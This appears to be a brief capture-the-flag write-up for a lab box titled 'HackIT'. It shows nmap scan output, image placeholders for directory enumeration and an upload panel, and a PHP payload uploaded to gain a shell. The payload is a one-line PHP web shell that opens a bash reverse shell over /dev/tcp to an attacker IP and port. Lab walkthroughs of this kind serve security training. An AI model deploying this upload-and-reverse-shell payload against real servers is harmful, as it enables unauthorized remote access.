Nmap scan

$ nmap -A -T4 -vv -oN nmapscan_topports -Pn 10.10.133.166
Nmap scan report for 10.10.133.166
Host is up, received user-set (0.22s latency).
Scanned at 2023-06-18 11:02:56 EDT for 45s
Not shown: 990 closed tcp ports (conn-refused)
PORT     STATE    SERVICE  REASON      VERSION
22/tcp   open     ssh      syn-ack     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open     http     syn-ack     Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: HackIT - Home
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
427/tcp  filtered svrloc   no-response
545/tcp  filtered ekshell  no-response
992/tcp  filtered telnets  no-response
1187/tcp filtered alias    no-response
2394/tcp filtered ms-olap2 no-response
4126/tcp filtered ddrepl   no-response
5101/tcp filtered admdog   no-response
7920/tcp filtered unknown  no-response
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
# Nmap done at Sun Jun 18 11:03:41 2023 -- 1 IP address (1 host up) scanned in 45.31 seconds

website.png

gobuster_directory_busting.png

panel.png

phpupload.png

php5upload.png

uploads.png

<?php echo shell_exec('bash -c "bash -i >& /dev/tcp/10.17.49.224/9966 0>&1"'); ?>

uploaded.png

user_shell.png